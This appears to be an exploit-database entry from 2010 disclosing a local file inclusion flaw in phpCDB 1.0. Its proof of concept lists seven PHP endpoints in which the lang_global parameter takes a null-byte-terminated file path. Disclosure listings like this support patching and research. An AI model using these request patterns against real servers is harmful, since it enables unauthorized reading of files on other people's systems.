phpCDB <= 1.0 Local File Include Vulnerability

2010-02-27T00:00:00
ID 1337DAY-ID-11108
Type zdt
Reporter cr4wl3r
Modified 2010-02-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================
phpCDB <= 1.0 Local File Include Vulnerability
==============================================

##############################################################
##phpCDB <= 1.0 Local File Include Vulnerability
##############################################################
Download: http://sourceforge.net/projects/phpcdb/files/
##############################################################
PoC:
 [phpcdb_path]/firstvisit.php?lang_global=[LFI%00]
 [phpcdb_path]/newfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/showfolders.php?lang_global=[LFI%00]
 [phpcdb_path]/newlang.php?lang_global=[LFI%00]
 [phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]
 [phpcdb_path]/writecode.php?lang_global=[LFI%00]
 [phpcdb_path]/showcode.php?lang_global=[LFI%00]
##############################################################



#  0day.today [2018-01-05]  #